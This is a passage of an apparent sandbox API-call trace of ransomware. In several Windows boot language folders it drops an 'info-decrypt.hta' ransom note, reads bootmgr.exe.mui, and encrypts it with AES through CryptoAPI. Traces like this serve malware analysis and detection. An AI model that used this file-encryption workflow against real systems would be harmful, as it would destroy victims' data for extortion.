lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.129] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0186.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0186.129] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ru-RU\\info-decrypt.hta" (normalized: "c:\\boot\\ru-ru\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.129] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0186.129] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.129] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0186.129] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0186.129] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\info-decrypt.hta" (normalized: "c:\\boot\\ru-ru\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x45c [0186.130] GetFileType (hFile=0x45c) returned 0x1 [0186.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0186.130] GetFileType (hFile=0x45c) returned 0x1 [0186.130] WriteFile (in: hFile=0x45c, lpBuffer=0x38af990*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x38af990*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0186.131] WriteFile (in: hFile=0x45c, lpBuffer=0x38af990*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x38af990*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0186.131] CloseHandle (hObject=0x45c) returned 1 [0186.131] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.131] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0186.131] GetFileAttributesExW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x38b09ac | out: lpFileInformation=0x38b09ac*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050)) returned 1 [0186.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0186.132] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0186.132] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x45c [0186.132] GetFileType (hFile=0x45c) returned 0x1 [0186.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0186.132] GetFileType (hFile=0x45c) returned 0x1 [0186.132] GetFileSize (in: hFile=0x45c, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x16050 [0186.132] ReadFile (in: hFile=0x45c, lpBuffer=0x6dd2d58, nNumberOfBytesToRead=0x16050, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x6dd2d58*, lpNumberOfBytesRead=0x6a7f1bc*=0x16050, lpOverlapped=0x0) returned 1 [0186.134] CloseHandle (hObject=0x45c) returned 1 [0186.134] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0x66bb048) returned 1 [0186.135] CryptGenRandom (in: hProv=0x66bb048, dwLen=0x10, pbBuffer=0x38b0e6c | out: pbBuffer=0x38b0e6c) returned 1 [0186.654] CryptImportKey (in: hProv=0x66bb048, pbData=0x381d968, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7f450) returned 1 [0186.654] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.654] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.654] CryptDuplicateKey (in: hKey=0xb7f450, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f4d0) returned 1 [0186.654] CryptContextAddRef (hProv=0x66bb048, pdwReserved=0x0, dwFlags=0x0) returned 1 [0186.655] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x4, pbData=0x381da48*=0x1, dwFlags=0x0) returned 1 [0186.655] CryptSetKeyParam (hKey=0xb7f4d0, dwParam=0x1, pbData=0x381da14, dwFlags=0x0) returned 1 [0186.655] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6f53d78*, pdwDataLen=0x6a7f188*=0x16060, dwBufLen=0x16060 | out: pbData=0x6f53d78*, pdwDataLen=0x6a7f188*=0x16060) returned 1 [0186.656] CryptEncrypt (in: hKey=0xb7f4d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x381da70*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x381da70*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0186.657] CryptDestroyKey (hKey=0xb7f450) returned 1 [0186.657] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0186.657] CryptReleaseContext (hProv=0x66bb048, dwFlags=0x0) returned 1 [0186.658] GetFullPathNameW (in: lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\ru-RU\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.658] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0186.658] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\bootmgr.exe.mui" (normalized: "c:\\boot\\ru-ru\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0186.659] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0186.659] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0186.659] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0186.659] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0186.659] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f450 [0186.660] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.660] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0186.660] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0186.660] FindClose (in: hFindFile=0xb7f450 | out: hFindFile=0xb7f450) returned 1 [0186.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0186.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0186.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0186.660] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE", lpFilePart=0x0) returned 0xd [0186.661] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\", lpFilePart=0x0) returned 0xe [0186.661] FindFirstFileW (in: lpFileName="C:\\Boot\\sv-SE\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f450 [0186.661] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.661] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0186.661] FindNextFileW (in: hFindFile=0xb7f450, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0186.661] FindClose (in: hFindFile=0xb7f450 | out: hFindFile=0xb7f450) returned 1 [0186.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0186.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0186.662] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.662] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0186.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f188) returned 1 [0186.662] GetFileAttributesExW (in: lpFileName="C:\\Boot\\sv-SE\\info-decrypt.hta" (normalized: "c:\\boot\\sv-se\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x6a7f204 | out: lpFileInformation=0x6a7f204*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0186.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f184) returned 1 [0186.662] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed20, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.662] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x6a7ebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\info-decrypt.hta", lpFilePart=0x0) returned 0x1e [0186.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0bc) returned 1 [0186.662] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\info-decrypt.hta" (normalized: "c:\\boot\\sv-se\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x598 [0186.662] GetFileType (hFile=0x598) returned 0x1 [0186.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f0b8) returned 1 [0186.662] GetFileType (hFile=0x598) returned 0x1 [0186.663] WriteFile (in: hFile=0x598, lpBuffer=0x38208e8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x6a7f180, lpOverlapped=0x0 | out: lpBuffer=0x38208e8*, lpNumberOfBytesWritten=0x6a7f180*=0x1000, lpOverlapped=0x0) returned 1 [0186.664] WriteFile (in: hFile=0x598, lpBuffer=0x38208e8*, nNumberOfBytesToWrite=0x55e, lpNumberOfBytesWritten=0x6a7f154, lpOverlapped=0x0 | out: lpBuffer=0x38208e8*, lpNumberOfBytesWritten=0x6a7f154*=0x55e, lpOverlapped=0x0) returned 1 [0186.664] CloseHandle (hObject=0x598) returned 1 [0186.664] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ed28, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.664] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f1d4) returned 1 [0186.664] GetFileAttributesExW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), fInfoLevelId=0x0, lpFileInformation=0x3821904 | out: lpFileInformation=0x3821904*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640)) returned 1 [0186.664] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f1d0) returned 1 [0186.665] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec14, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0186.665] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f108) returned 1 [0186.665] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x598 [0186.665] GetFileType (hFile=0x598) returned 0x1 [0186.665] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f104) returned 1 [0186.665] GetFileType (hFile=0x598) returned 0x1 [0186.665] GetFileSize (in: hFile=0x598, lpFileSizeHigh=0x6a7f210 | out: lpFileSizeHigh=0x6a7f210*=0x0) returned 0x15640 [0186.665] ReadFile (in: hFile=0x598, lpBuffer=0x6f69df8, nNumberOfBytesToRead=0x15640, lpNumberOfBytesRead=0x6a7f1bc, lpOverlapped=0x0 | out: lpBuffer=0x6f69df8*, lpNumberOfBytesRead=0x6a7f1bc*=0x15640, lpOverlapped=0x0) returned 1 [0186.667] CloseHandle (hObject=0x598) returned 1 [0186.667] CryptAcquireContextW (in: phProv=0x6a7f15c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6a7f15c*=0xbdf8c0) returned 1 [0186.668] CryptGenRandom (in: hProv=0xbdf8c0, dwLen=0x10, pbBuffer=0x3821dc4 | out: pbBuffer=0x3821dc4) returned 1 [0188.757] CryptImportKey (in: hProv=0xbdf8c0, pbData=0x3690be0, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x6a7f12c | out: phKey=0x6a7f12c*=0xb7fa10) returned 1 [0188.757] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.757] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.757] CryptDuplicateKey (in: hKey=0xb7fa10, pdwReserved=0x0, dwFlags=0x0, phKey=0x6a7f11c | out: phKey=0x6a7f11c*=0xb7f390) returned 1 [0188.757] CryptContextAddRef (hProv=0xbdf8c0, pdwReserved=0x0, dwFlags=0x0) returned 1 [0188.758] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x4, pbData=0x3690cc0*=0x1, dwFlags=0x0) returned 1 [0188.758] CryptSetKeyParam (hKey=0xb7f390, dwParam=0x1, pbData=0x3690c8c, dwFlags=0x0) returned 1 [0188.758] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6f7f458*, pdwDataLen=0x6a7f188*=0x15650, dwBufLen=0x15650 | out: pbData=0x6f7f458*, pdwDataLen=0x6a7f188*=0x15650) returned 1 [0188.759] CryptEncrypt (in: hKey=0xb7f390, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3690ce8*, pdwDataLen=0x6a7f190*=0x0, dwBufLen=0x10 | out: pbData=0x3690ce8*, pdwDataLen=0x6a7f190*=0x10) returned 1 [0188.760] CryptDestroyKey (hKey=0xb7fa10) returned 1 [0188.760] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0188.760] CryptReleaseContext (hProv=0xbdf8c0, dwFlags=0x0) returned 1 [0188.760] GetFullPathNameW (in: lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui", nBufferLength=0x105, lpBuffer=0x6a7ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\sv-SE\\bootmgr.exe.mui", lpFilePart=0x0) returned 0x1d [0188.760] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f0f4) returned 1 [0188.760] CreateFileW (lpFileName="C:\\Boot\\sv-SE\\bootmgr.exe.mui" (normalized: "c:\\boot\\sv-se\\bootmgr.exe.mui"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0188.762] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7df30) returned 1 [0188.762] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0188.762] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0188.762] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0188.762] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0188.763] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.763] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8393ab6, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15440, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0188.763] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0188.763] FindClose (in: hFindFile=0xb7fa10 | out: hFindFile=0xb7fa10) returned 1 [0188.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f26c) returned 1 [0188.764] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x6a7f278) returned 1 [0188.764] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x6a7f2ac) returned 1 [0188.764] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR", nBufferLength=0x105, lpBuffer=0x6a7edb4, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR", lpFilePart=0x0) returned 0xd [0188.764] GetFullPathNameW (in: lpFileName="C:\\Boot\\tr-TR\\", nBufferLength=0x105, lpBuffer=0x6a7ed88, lpFilePart=0x0 | out: lpBuffer="C:\\Boot\\tr-TR\\", lpFilePart=0x0) returned 0xe [0188.764] FindFirstFileW (in: lpFileName="C:\\Boot\\tr-TR\\*", lpFindFileData=0x6a7efd4 | out: lpFindFileData=0x6a7efd4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7fa10 [0188.764] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: lpFindFileData=0x6a7efe4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0188.764] FindNextFileW (in: hFindFile=0xb7fa10, lpFindFileData=0x6a7efe4 | out: 